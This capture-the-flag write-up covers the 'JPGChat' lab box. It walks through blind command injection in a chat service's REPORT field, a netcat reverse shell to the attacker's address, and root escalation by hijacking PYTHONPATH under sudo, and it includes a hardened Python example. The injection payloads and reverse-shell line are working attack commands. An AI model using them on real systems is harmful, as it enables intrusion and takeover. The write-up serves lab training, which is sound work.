JPGChat

Enumeration:

Let's run nmap to see which ports are open:

sudo nmap -sCV -p- --min-rate 4000 -oN nmap/allports -vv 10.10.152.65

We only have two open ports: SSH on port 22 and an unknown service on port 3000. Let's check whether we can reach it in the browser:

It looks like a service we can interact with, using either message or report to write something.

Let's connect to it and interact with it using netcat:

nc 10.10.152.65 3000

It looks like we can send something to the admin.

But the program description says the source code is on GitHub, which means it is an open-source program. Let's check the source code to find something that might help us proceed:

Using Google dorking:

We find the repository:

It has the script and a README file:

Let's check the source code of the script:

If we take a closer look, we see that after we send REPORT, it asks for our username and our report, then passes both into a system-level command that saves them to a file without any sanitization. We cannot see the command's output, though.
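To make the REPORT weakness concrete, here is an added example (mine, not JPGChat's actual source): a reconstruction of the unsafe pattern the writeup describes, a tokenizer that shows how the `;` in the ping probe turns one command into two, and a hardened handler that writes the report file directly with no shell. The function names and the /tmp/reports.txt path are assumptions.

```python
import re
import shlex

# Assumed reconstruction of the REPORT handler the writeup describes (not the
# project's real source): the name and report are pasted into a shell string.
def build_unsafe_command(username, report, path="/tmp/reports.txt"):
    return f"echo {username}: {report} >> {path}"

def shell_command_count(cmdline):
    """Count how many separate commands the shell would execute for cmdline."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    count = 1
    for token in lexer:
        if token in (";", "&", "&&", "|", "||"):
            count += 1
    return count

# Hardened version: no shell at all, an allowlist for the username, and
# control characters stripped from the report so it cannot forge log lines.
USERNAME_RE = re.compile(r"[A-Za-z0-9_-]{1,32}")

def is_valid_username(username):
    return USERNAME_RE.fullmatch(username) is not None

def format_report_line(username, report):
    if not is_valid_username(username):
        raise ValueError("username may only contain letters, digits, '_' or '-'")
    clean = "".join(ch for ch in report if ch.isprintable())
    return f"{username}: {clean}\n"

def save_report_safe(username, report, path):
    line = format_report_line(username, report)
    with open(path, "a", encoding="utf-8") as fh:  # plain file write, no shell
        fh.write(line)
    return line

if __name__ == "__main__":
    payload = ";ping 10.21.153.250 -c 3"   # the writeup's probe, sent as a report
    print(shell_command_count(build_unsafe_command("wes", payload)))  # 2
    print(repr(format_report_line("wes", payload)))  # stored as plain text only
```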

Exploitation:

Let's try blind command injection with ping:

;ping 10.21.153.250 -c 3

And run tcpdump to capture the result:

tcpdump -i tun0 icmp

The connection hangs for three seconds, and in tcpdump:

We received three ICMP packets, which confirms blind command injection. Now let's get a shell on the box:

nc -nlvp 443
;busybox nc 10.21.153.250 443 -e bash

Let's upgrade our shell to a fully interactive one:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL + Z
stty raw -echo ; fg
stty rows 36 cols 172

Post-Exploitation:

After I performed a little enumeration, I found that we can run this script as the root user:

sudo -l

Since we have SETENV, we can set our PYTHONPATH environment variable to whatever we want. Let's find out what is inside the test_module script:

cat /opt/development/test_module.py

It imports everything from the compare module, and since we can manipulate PYTHONPATH, we can make the sudo command load our compare module instead of the legitimate one. First we create a malicious compare.py that gives us root privileges:

# /tmp/compare.py
import pty
pty.spawn("/bin/bash")

sudo PYTHONPATH=/tmp/ /usr/bin/python3 /opt/development/test_module.py

Here is the root flag; you can find the user flag in wes's home directory.
